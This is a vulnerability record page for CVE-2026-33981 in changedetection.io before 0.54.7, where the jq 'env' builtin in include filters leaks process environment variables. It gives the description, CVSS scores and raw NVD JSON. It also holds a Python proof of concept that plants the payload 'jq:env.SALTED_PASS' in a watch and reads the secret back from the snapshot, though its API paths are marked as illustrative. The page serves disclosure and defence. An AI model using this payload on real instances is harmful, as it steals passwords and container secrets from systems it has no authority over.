Security Vulnerability Report
CVE-2026-33981 CVSS 6.5 MEDIUM

CVE-2026-33981

Published: 2026-03-27 22:16:23
Last Modified: 2026-04-02 15:24:06

Description

changedetection.io is a free open source web page change detection tool. Prior to 0.54.7, the `jq:` and `jqraw:` include filter expressions allow use of the jq `env` builtin, which reads all process environment variables and stores them as the watch snapshot. An authenticated user (or unauthenticated user when no password is set, the default) can leak sensitive environment variables including `SALTED_PASS`, `PLAYWRIGHT_DRIVER_URL`, `HTTP_PROXY`, and any secrets passed as env vars to the container. Version 0.54.7 patches the issue.

CVSS Details

CVSS Score (v3.1 base score; the raw record below also lists a CVSS 4.0 base score of 8.3 HIGH)
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:webtechnologies:changedetection:*:*:*:*:*:*:*:* - VULNERABLE
changedetection.io < 0.54.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC concept for CVE-2026-33981 (changedetection.io before 0.54.7).
# Demonstrates that a `jq:` include filter using the jq `env` builtin makes
# the process environment end up in the watch snapshot; SALTED_PASS (the
# hashed password) is used as the example variable.
#
# NOTE(review): the endpoint paths and JSON field names are illustrative
# ("based on typical REST APIs", per the original author) and are not
# confirmed against the product's real API.
#
# Mitigation: upgrade to 0.54.7 or later, set an instance password (no
# password is the default, which leaves this reachable without
# authentication), and rotate any secret that was passed to the container
# as an environment variable while a vulnerable version was exposed.
import requests

TARGET = "http://target-ip:5000"

# Filter expression under test: the jq `env` builtin reads the process
# environment; SALTED_PASS is the hashed password.
jq_payload = "env.SALTED_PASS"

request_headers = {
    "Content-Type": "application/json",
    # "Authorization": "Bearer <token>"  # If auth is enabled
}

# Watch definition carrying the filter (field names are illustrative).
watch_body = {
    "url": "http://example.com",
    "title": "PoC Watch",
    "filter": f"jq:{jq_payload}",
}

# Step 1: create/update a watch that carries the filter.
response = requests.post(
    f"{TARGET}/api/v1/watch",
    json=watch_body,
    headers=request_headers,
)

if response.status_code != 200:
    print(f"Failed to create watch: {response.text}")
else:
    print("Watch created/updated successfully.")

    # Step 2: trigger a check so the filter is evaluated server-side.
    watch_id = response.json().get("id")
    check_resp = requests.post(
        f"{TARGET}/api/v1/watch/{watch_id}/check",
        headers=request_headers,
    )

    # Step 3: read back the snapshot, which on a vulnerable version holds
    # the value of the environment variable instead of page content.
    snapshot = requests.get(
        f"{TARGET}/api/v1/watch/{watch_id}/snapshot",
        headers=request_headers,
    )
    print("Snapshot content:")
    print(snapshot.text)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33981", "sourceIdentifier": "[email protected]", "published": "2026-03-27T22:16:22.793", "lastModified": "2026-04-02T15:24:05.933", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "changedetection.io is a free open source web page change detection tool. Prior to 0.54.7, the `jq:` and `jqraw:` include filter expressions allow use of the jq `env` builtin, which reads all process environment variables and stores them as the watch snapshot. An authenticated user (or unauthenticated user when no password is set, the default) can leak sensitive environment variables including `SALTED_PASS`, `PLAYWRIGHT_DRIVER_URL`, `HTTP_PROXY`, and any secrets passed as env vars to the container. Version 0.54.7 patches the issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", 
"modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:webtechnologies:changedetection:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.54.7", "matchCriteriaId": "70788C7C-32F4-4483-A7F7-83D5DC9D1C6A"}]}]}], "references": [{"url": "https://github.com/dgtlmoon/changedetection.io/commit/65517a9c74a0cbe1a4661314470b28131ef5557f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/dgtlmoon/changedetection.io/releases/tag/0.54.7", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-58r7-4wr5-hfx8", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-58r7-4wr5-hfx8", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}